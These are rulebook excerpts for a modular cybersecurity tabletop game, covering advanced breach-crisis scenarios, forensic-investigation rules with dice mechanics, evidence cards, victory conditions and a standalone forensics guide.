Special Events: - Turn 1: Stock drops 20% (breach announcement) - Turn 2: Analyst downgrades (stock drops another 15%) - Turn 3: Media "Death Spiral" narrative ("Company Doomed") - Turn 4: Short-seller report (negative narrative amplified) - Turn 5: Activist investor demands board change - Turn 6: Acquisition offer from vulture investor (lowball) - Turn 7: Board may accept acquisition (loses independence)
Team Decisions: 1. Focus on crisis response (stock takes care of itself) 2. Spend effort on investor relations (PR effort) 3. Respond to activist pressure (appeasement or defiance?) 4. Accept acquisition offer or fight it?
Indirect Crisis Complications: - Cannot spend freely on response (stock-based credit) - May need to cut crisis response budget (unexpected) - Board becomes distracted (shareholder meetings, hostile negotiations) - Executives leave (job market is competitive) - Crisis response effectiveness drops
Cost Implications: - Investor relations campaign: +10 Budget - Board/shareholder meetings: Distraction (-10 effectiveness) - Potential acquisition: Loss of independence - Employee departures: Loss of key expertise - Credit access: May be restricted (raises costs)
Communication Challenge: - Must manage investor narrative (balance hope + realism) - Must appear competent (or stock collapses more) - Media attention is intense (every statement scrutinized) - Cannot show weakness (stock market punishes)
Difficulty (v2.2): - Board trust starts at 50% (instead of 70%) - Budget -10 at setup (credit crunch) - EVENT-09 (Shareholder Pressure) fires at Turn 3 AND Turn 5 (it is scheduled twice this game)
Complexity: ADVANCED+ Multiple Simultaneous Compromises: Systems encrypted + data stolen + email account compromised Primary Challenge: Responding to multiple attack objectives simultaneously
Description: Not a single attack but multiple overlapping compromises: 1. Ransomware: File servers encrypted (production stops, cannot access files) 2. Data Breach: Database stolen (customer data exfiltrated) 3. Email Compromise: CEO's email account compromised (attacker can send as CEO)
Key Complications: - Attacker has multiple leverage points: - "Pay ransom or systems stay encrypted" (operational pressure) - "Pay to prevent data publication" (financial/reputational pressure) - "Stop responding or we'll send fake CEO email" (social engineering pressure) - Investigation difficulty: - Multiple attack vectors to investigate - May be different attackers or coordinated campaign - Each compromise has different timeline - Cannot determine if attacks are related or independent - Remediation priorities clash: - Decrypt systems immediately (get operations back) - Recover stolen data (prevent publication) - Secure CEO email account (prevent further compromise) - Cannot do all three at once (budget/time constraints)
Special Complications: - Fake CEO Email Risk: - Attacker sends email as CEO - "Approves" emergency spending - "Authorizes" data transfers - "Orders" employee actions - Teams cannot tell if email is real - Timeline Acceleration: - Email compromise creates urgency - Attacker can impersonate executives - Must immediately notify all employees - Breach of trust (employees distrust CEO emails)
Special Events: - Turn 1: Discovery of ransomware + data breach - Turn 2: Discovery of CEO email compromise - Turn 3: Fake CEO email sends "emergency transfer" (employees confused) - Turn 4: Attacker threatens to send more fake emails (escalation) - Turn 5: Ransom deadline, data publication deadline, email account deadline (all converging)
Investigation Complexity: - Three separate forensics investigations (expensive) - Each compromise requires different approach - Timelines may overlap (more complexity) - May be related (same attacker) or unrelated (unlucky)
Cost Implications: - Triple forensics: +20 Budget (investigating all three) - Triple ransom/extortion demands: $10M+ total - Remediation: +25 Budget (rebuild files, backup, email security) - Communication: +15 Budget (notifying employees about fake emails) - Regulatory fines: Stacked (multiple breach types)
Team Decisions: 1. Which compromise to prioritize? (Cannot fix all simultaneously) 2. Pay multiple ransoms or negotiate single amount? 3. How to prevent fake CEO emails during investigation? 4. How to rebuild trust after email compromise?
Communication Challenge: - Must warn employees about fake emails (careful wording) - Cannot fully disclose CEO email compromise (executive embarrassment) - Must appear to have control (or stock crashes) - Media narrative: "Multiple breaches mean security is very bad"
Difficulty (v2.2): - +2 turns of events: EVENT-08 (Second Breach) is pre-armed and fires automatically at Turn 6 (once) — the game runs 10 turns - All track advances -5% (three simultaneous investigations; minimum +5%) - The ransom deadline covers all three extortion threats — one ACTION-13 decision resolves them together
Complexity: ADVANCED+ Context: Breach happens while company is being acquired or merging Primary Challenge: Managing breach while deal dynamics change
Description: Breach is discovered during critical phase of M&A transaction: - Company announced acquisition/merger - Deal close in 30-45 days - Due diligence is underway (acquirer evaluating company) - Breach discovered mid-deal - Acquirer may walk away (reduces deal value or terminates) - Regulators may block deal (antitrust, security concerns)
Key Complications: - Deal Dynamics: - Acquirer discovers breach during due diligence - Acquirer may lower offer price (leverage) - Acquirer may demand warranty/escrow (financial penalty) - Deal may fail entirely (destroys shareholder value) - Information Control: - Acquirer has limited information (still under NDA) - Seller has incentive to minimize breach - Acquirer has incentive to maximize perceived severity - Buyer/seller information asymmetry complicates response - Regulatory Issues: - Merger may be blocked for security concerns - FTC may demand security improvements (delay deal) - State regulators may oppose merger (security risk) - Deal timing already tight (additional scrutiny delays close) - Board Pressure: - Board wants to preserve deal value - May demand minimal response (to not disclose full scope) - May pressure executives to downplay breach - Creates pressure for inadequate response
Timeline Pressure: - Deal must close in 30-45 days - Breach response takes time - Regulatory review adds time - Conflicting priorities: Deal vs. Response
Special Events: - Turn 1: Breach discovered, acquirer learns in due diligence - Turn 2: Acquirer threatens to walk away (leverage) - Turn 3: Price renegotiation (acquirer lowers offer 10-20%) - Turn 4: Regulatory delay (FTC requests documents) - Turn 5: Deal extension negotiations (need more time for breach response) - Turn 6: Shareholder lawsuit (shareholders allege breach was hidden)
Team Decisions: 1. Full disclosure to acquirer (cooperation but deal value drops) 2. Minimal disclosure (preserve deal but fraud risk) 3. Separate negotiation: breach response vs. acquisition terms 4. Push for deal delay (to respond properly to breach)
Complex Incentives: - Company wants: - Deal to close at good price - Breach to be minimized - Acquirer to handle breach remediation - Acquirer wants: - Full disclosure of breach - Lower price to account for risk - Warranties that seller covers breach costs - Regulators want: - Full investigation - Breach remediation - Assurance of future security - May block if combined entity is too powerful
Cost Implications: - Breach response: Standard costs (+20-30 Budget) - Deal renegotiation: Millions in lost value - Regulatory review: Delays (may block deal) - Shareholder lawsuit: If breach was hidden, liability - Escrow/warranty: Seller may have to hold money as security
Communication Challenge: - Cannot disclose full breach details (acquirer has leverage) - Cannot hide breach (fraud risk) - Must negotiate simultaneously with acquirer + regulators + investigators - Media discovery complicates (stock price pressure)
Difficulty (v2.2): - Communication advances are halved (every statement is reviewed by two legal teams) - Board trust starts at 50% (deal-preservation pressure to under-respond) - Turn-3 Special Event: price renegotiation — Board trust -10 if Investigation is below 25% (the board can't answer the acquirer's questions)
| Scenario | Challenge | Difficulty | Key Pressure |
|---|---|---|---|
| SCENARIO-01 | Multi-Region Legal | HIGH | 3 different regulatory timelines |
| SCENARIO-02 | Ransomware Extortion | HIGH | $10M decision + data publication threat |
| SCENARIO-03 | Supply Chain Liability | HIGH | Vendor failure, customer trust |
| SCENARIO-04 | Insider Threat | HIGH | Organizational trust collapse |
| SCENARIO-05 | Critical Infrastructure | EXTREME | Lives at risk, government control |
| SCENARIO-06 | Stock Crash | HIGH | Financial crisis + board pressure |
| SCENARIO-07 | Triple Compromise | EXTREME | 3 simultaneous attacks, multiple ransoms |
| SCENARIO-08 | M&A Complications | EXTREME | Deal value + regulatory blocks |
Use if: - Playing with experienced crisis management teams - Want sophisticated, realistic scenarios - Have time for complex decision-making (add 20-30 min per scenario) - Want to teach cascading effects of bad decisions
Skip if: - Playing with beginners (too complex) - Want simpler, faster gameplay - Limited time available - Focus is on learning basics
Start with easier scenarios: 1. SCENARIO-01 (Multi-Region): Complex but straightforward 2. SCENARIO-02 (Ransomware): Familiar from news, clear choices 3. SCENARIO-04 (Insider): Interesting organizational dynamics
Progress to harder scenarios: 4. SCENARIO-03 (Supply Chain): Adds liability complexity 5. SCENARIO-06 (Stock Crash): Financial crisis layer
Reserve for expert play: 6. SCENARIO-05 (Critical Infrastructure): Government involvement changes everything 7. SCENARIO-07 (Triple Compromise): Multiple simultaneous crises 8. SCENARIO-08 (M&A): Extreme complexity, conflicts of interest
Disaster Recovery Module: Advanced Crisis Scenarios (Expansion) Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
docs/rules/module-forensics.md
Version: 2.2 - Playtest Edition (rule changes marked "(v2.2)"; see v2.2 Playtest Edition Changes) Last Updated: July 2026
The Forensics Module teaches incident investigation, digital forensics, and attack attribution. This module is typically entered after Incident Response or Disaster Recovery (representing the investigation phase of response) but can also be played standalone to teach forensic analysis concepts.
Rather than detecting the attack or managing the crisis, Forensics focuses on the crucial post-breach investigation phase: - Evidence collection and preservation - Timeline reconstruction of attacker actions - Attack chain analysis linking findings to MITRE ATT&CK techniques - Attribution and threat intelligence (who did this and how?) - Attack surface analysis (how did they get in?) - Lessons learned for future hardening and network building
Incident Response: Teaches proactive threat detection Hardening (typically after an IR win): Teaches proactive defense Disaster Recovery (typically after an IR loss): Teaches crisis management Forensics (after IR or DR): Teaches investigation and learning
Forensics can also be played standalone to teach forensic methodology without the preceding modules.
In Campaign Play: 1. After Incident Response failure (undetected breach) → Forensics Phase 2. After Disaster Recovery (crisis management) → Forensics Phase 3. After Hardening success (discovered attack) → Optional Forensics for deeper learning
In Standalone Play: - Forensics module can be played independently as a 45-90 minute investigation scenario
Outputs from Forensics: - Attack Chain Reconstruction: Detailed understanding of how attacker progressed - Vulnerability Discovery: Systems and methods exploited - Threat Intelligence: IOCs (Indicators of Compromise), malware samples, attacker infrastructure - Timeline Evidence: When each compromise occurred
Used In: - Hardening Module: "Build defenses against the techniques discovered in forensics" - Network Building Module: "Redesign network architecture knowing how attacker pivoted" - Audit & Compliance Module: "Assess coverage of controls that should have detected forensic findings"
Trigger Options:
Blue Team now investigates for attribution and deeper understanding
Standalone Setup: Team starts fresh investigation (no prior IR/DR)
When entering Forensics after IR or DR, the Threat Orchestrator reveals the attack context:
Example (After IR Success): "Your security team detected and contained an attack chain: 1. Phishing email (SOCIAL ENGINEERING) 2. Credential harvesting malware (MALWARE) 3. Lateral movement to admin account (CREDENTIAL ABUSE)
Now you investigate to understand: How deep did they get? Are there other persistence mechanisms? Can we attribute this to a known threat group?"
Example (After DR/IR Failure): "Forensic examination of compromised systems reveals: 1. Initial access via credential stuffing (CREDENTIAL ABUSE) 2. Privilege escalation via unpatched service (WEB EXPLOIT) 3. Persistence through scheduled task modification (MALWARE) 4. Data exfiltration via DNS tunneling (DATA EXFIL)
Now you reconstruct the complete timeline and attribute the attack."
These represent forensic investigation techniques and evidence collection methods.
Standard Investigation Actions:
| Card | Technique | DC | Cost | Time | Result |
|---|---|---|---|---|---|
| DISK-01 | Disk Image & Analysis | 12 | 10 | 2 turns | Recover deleted files, malware samples |
| DISK-02 | File System Carving | 14 | 15 | 3 turns | Deep file recovery, hidden artifacts |
| MEM-01 | Memory Dump & Analysis | 13 | 15 | 2 turns | Volatile process info, injected code |
| MEM-02 | Memory Forensics Deep Dive | 15 | 20 | 3 turns | Malware behavior, command-and-control |
| LOG-01 | Event Log Analysis | 11 | 5 | 1 turn | Timeline of user actions, logins |
| LOG-02 | Deep Log Correlation | 13 | 10 | 2 turns | Cross-system timeline, attack sequence |
| NET-01 | Network Traffic Analysis | 12 | 10 | 2 turns | Exfiltration evidence, C2 communications |
| NET-02 | Packet Capture Deep Analysis | 14 | 15 | 3 turns | Protocol-level forensics, attacker tools |
| MALW-01 | Malware Analysis (Dynamic) | 12 | 15 | 2 turns | Behavior analysis, IOCs |
| MALW-02 | Malware Analysis (Static) | 14 | 10 | 2 turns | Code reverse engineering, capabilities |
| TIMELINE-01 | Timeline Reconstruction | 13 | 5 | 1 turn | Chronological attack sequence |
| THREAT-01 | Threat Attribution Analysis | 15 | 20 | 3 turns | Link to known groups, TTPs |
DISK-01 rush option (v2.2): pay +5 Budget (15 total) to run it at Duration 1.
Investigation Action Card Structure: - Title: e.g., "Disk Image & Analysis" - Technique: MITRE ATT&CK reference (e.g., "Forensic Analysis") - Difficulty Class (DC): Roll d20+modifiers vs. this number to succeed - Cost: Budget required to perform investigation - Duration: Number of turns this investigation takes - What It Reveals: Type of evidence discovered (see Evidence Cards below) - Success Condition: d20+forensics_skill vs. DC (11+ usually succeeds, but higher DC cards reward skilled investigators)
Investigation Duration (v2.2): Starting an investigation with Duration N occupies your action on the turn you start it (pay the Budget cost then). Count the turn you start it as turn 1: the results (evidence + meter advances) arrive — and the roll is made — at the START of turn N. So Duration 1 resolves immediately on the same turn; Duration 2 resolves at the start of the following turn; Duration 3 resolves two turns after starting. Only ONE multi-turn (Duration 2+) investigation may be in flight at a time, but you may take other actions (Analyze Evidence, Follow Lead, or a Duration 1 investigation) while waiting.
These represent specific findings from investigations. They document what was discovered and provide investigative leads.
Categories of Evidence (core deck counts):
A. Malware & Persistence (4 cards: EVD-01, EVD-03, EVD-08, EVD-10) - Trojan samples with capabilities (spyware, RAT, backdoor) - Persistence mechanisms (scheduled tasks, registry modifications, startup folders) - Encryption keys recovered from malware or memory - Malware behavior profiles from sandbox analysis
B. Credentials & Access (1 card: EVD-04) - Admin account compromise timeline - Suspicious logins from unusual times, locations, or sources
C. Lateral Movement (1 card: EVD-05) - Pass-the-hash evidence - Tools used for pivoting - Systems accessed with each credential
D. Exfiltration (1 card: EVD-06) - Volume of data exfiltrated - File types extracted - Destination IP addresses or domains - Timing of exfiltration windows
E. Attack Infrastructure (2 cards: EVD-02, EVD-07) - Command-and-control servers - Malware staging servers - Registrar information (domain registration) - ASN and geolocation data
F. Attack Activity (3 cards: EVD-09, EVD-11, EVD-12) - Attacker command history - File staging artifacts (what was collected before exfiltration) - Anti-forensics evidence (log deletion, timestamp manipulation)
Evidence Card Structure: - Title: Specific finding (e.g., "Credential Dumper Malware") - Type: Category (Malware, Persistence, Credentials, Movement, Exfiltration, Infrastructure, Timeline) - MITRE ATT&CK Technique: Referenced technique (e.g., T1003 - OS Credential Dumping) - Description: What was found and where - Investigation Source: Which Investigation Action card led to this - Investigative Lead: What the Blue Team can do with this information - Connection to Attack Chain: Links back to specific Threat cards from IR phase (if sequential)
These represent the conclusions of the forensic investigation and feed into recommendations.
Finding Types:
| Finding | Description | Feeds Into Module |
|---|---|---|
| FIND-01: Threat Attribution Report | Identified attacker group, techniques, motivations | Hardening, Audit & Compliance (threat model), Incident Response |
| FIND-02: Attack Surface Analysis | Systems/methods exploited; entry points identified | Network Building, Hardening, Audit |
| FIND-03: Persistence Mechanisms Discovered | How attacker maintained access; backdoors identified | Hardening (remove persistence), Disaster Recovery, Audit |
| FIND-04: Investigative Gaps & Recommendations | Questions answered vs. remaining; next steps | Audit & Compliance (post-incident review), Training |
Physical Components: - Investigation Action cards (12 cards) - Evidence cards (12 cards) - Findings cards (4 cards) - Turn Tracker (8-15 turns typical) - Budget Tracker (Investigation budget: 0-100) - Progress Meters (see below): - Timeline Completeness (0-100%) - Attack Chain Reconstruction (0-100%) - Attribution Confidence (0-100%) - Evidence Chain of Custody (0-100%)
Optional: - Investigation Flow Chart (showing how actions lead to evidence discovery) - MITRE ATT&CK Technique reference sheet - Evidence correlation board (physical board or spreadsheet linking evidence)
Turn Structure: - Easy (TIER 1): 6-8 turns | Simple attack, few pivot points, obvious artifacts - Medium (TIER 2): 8-10 turns | Standard breach with some obfuscation - Hard (TIER 3): 11-13 turns | Complex attack, sophisticated attacker, limited logging - Expert (TIER 4): 14-15 turns | APT-level sophistication, anti-forensics measures, encrypted communications
Turn Length Determination: Using the Variable Turn Length System (see Core Rules): 1. Threat Orchestrator selects attack complexity tier 2. Roll d4 for variation (-1, 0, 0, +1) 3. Announce final turn count to Blue Team
Investigation Budget: - Starting Budget: 75 (represents forensic lab time, tools, personnel) - Optional Bonus: +25 if company has cyber insurance or threat intelligence subscription - Budget Tracker Range (v2.2): 0-100 (75 base + 25 optional bonus is the maximum starting value)
Each turn, the Blue Team performs ONE of these actions:
Description: The team describes a specific forensic investigation they want to perform.
Mechanics: 1. Choose Investigation Card: Select from available Investigation Action cards (Disk, Memory, Logs, Network, Malware, Timeline, or Attribution) 2. Pay Cost: Spend Budget equal to card cost (paid on the turn you start the investigation) 3. Resolve Duration (v2.2): If Duration is 2+, the roll and results wait until the START of the turn the investigation completes (see Investigation Duration rule above) 4. Roll: d20 + relevant skill modifier vs. Difficulty Class on card - Modifiers: - +2 if team has forensics background - +1 if prior Investigation Action revealed clues to this technique - +1 if team provides detailed narrative explanation of investigation approach - -2 if investigation is being done hastily (using extra turn pressure to rush) 5. Check Results: - Success (roll ≥ DC): Discover ONE Evidence card — unless the card says otherwise (v2.2: MEM-02 and NET-02 award TWO) — and apply that Evidence card's printed meter impacts (see No Double Counting, Rule 5) - Partial Success (roll DC-2 to DC-1): Discover PARTIAL Evidence (partial timeline, hints of compromise, etc.) and apply the investigation card's partial-success advance line - Failure (roll < DC-2): No Evidence discovered this turn; Budget still spent
Progress Meter Advancement: Each successful Investigation Action advances one or more Progress Meters. Typical advances are +5-35% per meter (major breakthroughs can exceed +20%): - Timeline Completeness (+5-35%): Evidence that establishes temporal sequence - Attack Chain Reconstruction (+5-35%): Evidence linking attacker actions together - Attribution Confidence (+5-35%): Evidence pointing to threat actor identity - Evidence Chain of Custody: advances via the Chain of Custody rule (v2.2, Rule 1) and the printed impacts on some Evidence cards
Example Investigation:
Blue Team: "We want to conduct a disk image and analysis of the compromised server." Cost: 10 Budget (paid now). DISK-01 has Duration 2, so the team's action this turn is starting the imaging; results arrive at the start of the next turn. DC: 12 Blue Team Roll (at the start of the next turn): d20 + 2 (forensics background) = 15 Result: Success! Discover evidence card EVD-01 "Credential Dumper Malware" and apply its printed impacts: Attack Chain +15%, Attribution +10%, Timeline +10%. The team states the binary was hashed (SHA-256) before analysis: Chain of Custody +5% (v2.2)
Description: The team reviews evidence cards already discovered and makes connections.
Cost (v2.2): 5 Budget. Each Evidence card can be Analyzed only once (v2.2) — mark cards as Analyzed when they are included in this action.
Mechanics: 1. Pay Cost: Spend 5 Budget (v2.2) 2. Review Evidence: Team looks at 2-4 not-yet-Analyzed Evidence cards already discovered 3. Make Connection: Team describes how findings are related (temporal, technical, or attribution-based) 4. Roll: d20 + relevant skill vs. DC 10 - Modifiers: - +2 if team connects 3+ evidence cards in coherent narrative - +1 if connection references specific MITRE ATT&CK technique 5. Check Results: - Success (roll ≥ 10): Gain insight; advance two Progress Meters by 5-10% each - Failure (roll < 10): No progress; action still costs a turn (represents time spent on dead-end analysis)
Example Analysis:
Blue Team: "The malware sample found in memory matches the persistence mechanism in the scheduled task, suggesting the attacker uploaded the same tool twice. This indicates they knew what they were doing and weren't just randomly exploring." Roll: d20 + 2 (good narrative) = 16 Result: Success! +10% Attribution Confidence (skilled attacker), +10% Attack Chain Reconstruction (coordinated multi-stage attack)
Description: Based on existing evidence, the team pursues a specific investigative thread.
Cost (v2.2): 5 Budget (printed cost for every Follow Investigative Lead action).
Mechanics: 1. Pay Cost: Spend 5 Budget (v2.2) 2. Choose Evidence Card: Pick an Evidence card with an "Investigative Lead" 3. Describe Approach: How will the team pursue this lead? (e.g., "Track the C2 domain to registrar records to find other registered domains") 4. Roll: d20 + relevant skill vs. DC (varies 11-14 depending on lead) 5. Check Results: - Success: Discover a new Evidence card directly related to the lead and apply its printed meter impacts (v2.2: if no suitable undiscovered Evidence card exists, advance Attribution Confidence +20% instead — never both) - Partial Success: Discover related evidence but get a false lead (discover 1 Evidence + 1 Red Herring card) - Failure: Dead-end lead; use turn without discovering evidence
Example Lead:
Evidence Card: "Command-and-Control Communications (IP: 203.0.113.45)" Investigative Lead: "Perform ASN and WHOIS lookup to find other infrastructure operated by this attacker" Blue Team: "Let's trace the IP's ASN and registrar records to find other malicious domains." Cost: 5 Budget (v2.2) Roll: d20 + 1 (good idea) = 14 vs. DC 12 Result: Success! Discover EVD-07 "Attacker Infrastructure Map" and apply its printed impacts: Attribution +30%, Attack Chain +15%, Timeline +10%. Team documents WHOIS/passive-DNS exports: Chain of Custody +5% (v2.2)
The Blue Team achieves ONE of these:
Victory Condition 1: "Full Attribution" - Attribution Confidence ≥ 90% AND Timeline Completeness ≥ 80% - Outcome: "Your investigation successfully attributes this attack to [Known Threat Group]. Security intelligence briefing prepared."
Victory Condition 2: "Solid Case" - Timeline Completeness ≥ 80% AND Attack Chain Reconstruction ≥ 80% AND Evidence Chain of Custody ≥ 70% - Outcome: "Your forensic report is publishable quality and defensible in court. Law enforcement briefed."
Victory Condition 3: "Partial Findings" - Any two Progress Meters ≥ 70% at game end - Outcome: "Investigation concluded. Findings are actionable for hardening and threat intelligence."
Precedence (v2.2): - Victory conditions are always checked FIRST. The old "any meter < 40% = failure" clause is DELETED (it conflicted with Victory Condition 3): a low meter never overrides a met victory condition. - Budget exhaustion is NOT a loss. The game continues to the turn limit: you may always take the cheap 5-Budget actions (Analyze Existing Evidence, Follow Investigative Lead, LOG-01, TIMELINE-01) while Budget lasts, and even at 0 Budget the team keeps playing (narrating connections, re-checking victory at game end). Victory conditions are still checked normally.
Penalty for Inconclusive Investigation: - Cannot feed findings into Hardening or Network Building modules - Audit & Compliance module must assess with incomplete information - Reduced confidence in future threat intelligence
Every Evidence card must be documented to maintain admissibility in legal proceedings.
Earning Chain of Custody (v2.2): +5% Chain of Custody every time an Evidence card is discovered AND the team states how it was preserved (hash, imaging, log export); the TO may award +10% for exemplary handling. This is in addition to any Chain of Custody impact printed on the Evidence card itself.
How It Works: - When an Evidence card is discovered, mark how it was obtained (which Investigation Action) and state how it was preserved - If chain of custody is broken (evidence obtained illegally or improperly), it becomes inadmissible - Inadmissible evidence cannot be used for Attribution or Timeline building - Cost to fix broken chain: 5 Budget + 1 turn to re-document evidence
Example:
Evidence "Admin Credentials Exfiltrated" discovered via "Memory Dump Analysis" (legal). Chain of custody: intact. Can be used in court. But if same evidence discovered via "Unauthorized System Access" by Blue Team (illegal), chain is broken and evidence is inadmissible.
More sophisticated attacks may include anti-forensics measures that complicate investigation.
Anti-Forensics Examples: - Log deletion or manipulation - Encrypted communication channels - Malware that overwrites disk sectors - Timeline obfuscation (backdated files, timezone manipulation)
How It Works: - Threat Orchestrator can note that certain Investigation Actions are harder due to anti-forensics - Affected Investigation Cards gain +2 DC penalty if anti-forensics present - Example: "Evidence logs were deleted. Log Analysis (DC 11) now has DC 13."
Overcoming Anti-Forensics: - Investigators can use advanced techniques (Memory Forensics, Network Traffic Analysis) that bypass deleted logs - Alternatively, combine multiple Investigation Actions to corroborate timeline from different sources - Example: "Timeline can't be built from deleted logs, but network traffic shows exfiltration at 2:15 AM, and memory analysis shows C2 connection at 2:10 AM. We can reconstruct it."
Represents how long the attacker remained in the network before detection or expulsion.
Mechanics (v2.2): - If the scenario states the attacker dwelled undetected 3+ turns (or the preceding Incident Response module ran 10+ turns), apply +1 DC to DISK and LOG investigations (evidence degraded). - Longer dwell time = more data exfiltrated, more persistence mechanisms installed, harder to attribute - But longer dwell also = more evidence: the TO may make 1-2 additional Evidence cards discoverable (more actions, more forensic artifacts)
Example:
Scenario states the attacker dwelled undetected for 4 turns before the investigation began. DISK-01, DISK-02, LOG-01, and LOG-02 all have +1 DC (evidence degraded over time). But the Blue Team can discover more Evidence cards (+2 cards total) due to the attacker's extended activity.
Some investigations may yield partial or fragmentary evidence that requires interpretation.
How It Works: - Partial success on Investigation roll = discover Evidence card marked "INCOMPLETE" - INCOMPLETE Evidence provides +1 Progress Meter advance but is NOT admissible alone for conclusions - Team can retry investigation next turn to complete the evidence (costs full Budget again) - Or team can interpret incomplete evidence by rolling d20+investigator skill vs. DC 12 - Success: Use incomplete evidence as-is (risky but saves Budget) - Failure: Incomplete evidence leads to false conclusion (Red Herring card added)
Investigation cards list meter advances AND discovered Evidence cards list their own meter impacts. Never apply both.
How It Works: - When an investigation discovers an Evidence card, apply ONLY the Evidence card's printed meter impacts. - The investigation card's own "Advance" line applies only when no Evidence card is produced — e.g., a partial success that yields fragments, or a success when no suitable undiscovered Evidence card remains. - The +5% Chain of Custody handling bonus (Rule 1, v2.2) still applies on top of the Evidence card's printed impacts — it rewards documentation, not discovery.
Base Skill Modifiers (apply to all Investigation rolls):
| Background | Modifier | Example |
|---|---|---|
| Forensic Analyst or Incident Responder | +2 | Person with formal training |
| IT Security or System Administrator | +1 | Technical background but not formal IR training |
| General IT | +0 | Basic tech knowledge |
| Non-Technical | -2 | No technical background |
| Forensics Researcher (GIAC GCFE, etc.) | +3 | Expert-level investigator |
Situational Modifiers: - +1: Detailed narrative explanation of investigation methodology - +2: Team describes investigation approach that references MITRE ATT&CK framework - +1: Prior Investigation Action discovered clues to current investigation - -2 (v2.2): Using hastily (team taking Forensics as last-ditch effort in final turn) - -2: Investigation approach is technically unsound or unrealistic
When playing Forensics as a standalone game (without prior IR/DR):
Note which investigation techniques would discover each threat
Blue Team Briefing:
"You've been called to investigate a data breach discovered during routine system maintenance. Initial assessment: - Critical database server accessed 2 weeks ago - 5 million customer records potentially compromised - Attacker origin and motivations unknown - You have [TURN COUNT] turns to reconstruct the attack and find attribution clues. - Starting Budget: 75 (or 100 for well-funded incident response team)"
Available Actions:
Follow Investigative Leads
Victory Conditions (v2.2):
Sequence 1: Detect & Investigate (90 minutes) - Incident Response (45 min) - Detect attack chain - Forensics (45 min) - Investigate and attribute
Sequence 2: Failure & Investigation (120 minutes) - Incident Response (45 min) - Fail to detect all threats - Disaster Recovery (45 min) - Manage breach crisis - Forensics (30 min) - Investigate for lessons learned
Sequence 3: Complete Lifecycle (180+ minutes) - Network Building (45 min) - Design initial network - Hardening (45 min) - Build defenses - Incident Response (45 min) - Test defenses - Disaster Recovery (45 min) - Handle failure - Forensics (30 min) - Investigate findings - Audit & Compliance (30 min) - Assess overall security posture
After Forensics concludes, facilitate discussion around these questions:
Investigation Process: 1. What investigation techniques were most revealing? Why? 2. What evidence was most critical to understanding the attack? 3. What was the attacker's most sophisticated technique? What made it hard to detect forensically? 4. How would the investigation have been different with better logging? Better endpoint tools?
Attribution & Intelligence: 1. What threat actor profile emerged? What's their likely motivation? 2. What geographic or geopolitical clues do you see in the evidence? 3. How would you share this intelligence with law enforcement or information sharing communities?
Hardening & Prevention: 1. Based on forensic findings, what specific defenses would prevent this attack? 2. How would you network design need to change to limit lateral movement? 3. What logging and monitoring would have caught this earlier?
Real-World Connection: 1. How does this scenario compare to actual breaches you've studied? (VERIZON DBIR, Microsoft Security Incidents, etc.) 2. What's the typical cost of forensic investigation in real incidents? 3. How does attribution accuracy impact threat intelligence and policy response?
Each Investigation Action card and Evidence card should reference specific MITRE ATT&CK techniques/procedures:
Investigation Actions → Techniques Discovered: - Disk Forensics → T1005 (Data from Local System), T1025 (Data from Removable Media) - Memory Forensics → T1112 (Modify Registry), T1055 (Process Injection) - Log Analysis → T1071 (Application Layer Protocol), T1090 (Proxy) - Network Analysis → T1041 (Exfiltration Over C2 Channel), T1048 (Exfiltration Over Alternative Protocol) - Malware Analysis → T1104 (Multi-Stage Channels), T1059 (Command and Scripting Interpreter) - Timeline Reconstruction → T1074 (Data Staged), T1003 (OS Credential Dumping) - Attribution → G#### group / S#### software identification (threat attribution)
TIER 1 (6-8 turns): Unsophisticated attacker, plenty of artifacts, obvious malware - Low DC (10-12) Investigation Actions - Evidence cards plentiful and obvious - Chain of custody intact - No anti-forensics measures - Example: Script kiddie using public exploits, little cleanup
TIER 2 (8-10 turns): Standard attacker, some cleanup, moderate sophistication - Medium DC (12-14) Investigation Actions - Evidence cards present but require analysis - Some chain of custody concerns - Basic anti-forensics (log deletion) - Example: Credential theft ring, lateral movement, data exfil
TIER 3 (11-13 turns): Sophisticated attacker, significant obfuscation - High DC (13-15) Investigation Actions - Evidence requires correlation across multiple sources - Chain of custody significant challenge - Advanced anti-forensics (encryption, timeline spoofing) - Example: APT group with operational security discipline
TIER 4 (14-15 turns): Nation-state or elite attackers, expert anti-forensics - Very high DC (14-16+) Investigation Actions - Evidence heavily fragmented and incomplete - Chain of custody nearly impossible to prove - Sophisticated anti-forensics and counter-attribution - Example: State-sponsored APT with deep technical expertise
See cards/forensics/core-deck/investigation-cards.md for printable Investigation Action cards.
See cards/forensics/core-deck/evidence-cards.md for printable Evidence and Findings cards.
Setup: Select complexity tier, roll d4, announce turn count Actions: Conduct Investigation (card cost, Duration 1-3 turns), Analyze Evidence (5 Budget, each Evidence card only once), Follow Leads (5 Budget) Rolls: d20 vs. DC, with skill modifiers; partial success on DC-2 to DC-1 Durations (v2.2): Duration N resolves at the start of turn N, counting the starting turn as turn 1 (Duration 1 = immediate); only one multi-turn investigation in flight at a time Resources: Budget (75 base, tracker 0-100), Turns (6-15), Progress Meters (4 tracked) Victory (v2.2): - V1 "Full Attribution": Attribution ≥90% AND Timeline ≥80% - V2 "Solid Case": Timeline ≥80% AND Attack Chain ≥80% AND Chain of Custody ≥70% - V3 "Partial Findings": any two meters ≥70% at game end Failure (v2.2): At the turn limit, no victory condition met. Victory conditions are checked first; there is no meter-minimum failure clause and budget exhaustion is not a loss.
\CurrentVersion.docs/standalone-games/forensics.md
Version: 2.2 - Playtest Edition (rule changes marked "(v2.2)" — see the module rules doc for the full change list) Duration: 45-90 minutes Player Count: 1 Threat Orchestrator + 1-4 Investigators Complexity: Intermediate to Advanced
This guide explains how to play the Forensics Module as a standalone game, without needing to have played Incident Response, Hardening, or Disaster Recovery first.
In standalone Forensics, you are a team of incident investigators called in to analyze a data breach. Your goal is to reconstruct the attack, discover the attacker's techniques, and if possible, attribute the breach to a known threat actor. This is a "detective" game focused on piecing together evidence rather than detecting or preventing attacks.
The Threat Orchestrator (game facilitator) selects an attack complexity tier. Do NOT tell the Blue Team the tier—it's secret.
| Tier | Turn Count | Attack Type | Example |
|---|---|---|---|
| TIER 1 (Beginner) | 6-8 | Script kiddie, basic malware | Casual cybercriminal, obvious techniques |
| TIER 2 (Intermediate) | 8-10 | Organized attacker, some sophistication | Credential theft ring, lateral movement |
| TIER 3 (Advanced) | 11-13 | Skilled APT, heavy obfuscation | Sophisticated threat group with operational security |
| TIER 4 (Expert) | 14-15 | Nation-state, elite techniques | State-sponsored APT with counter-forensics |
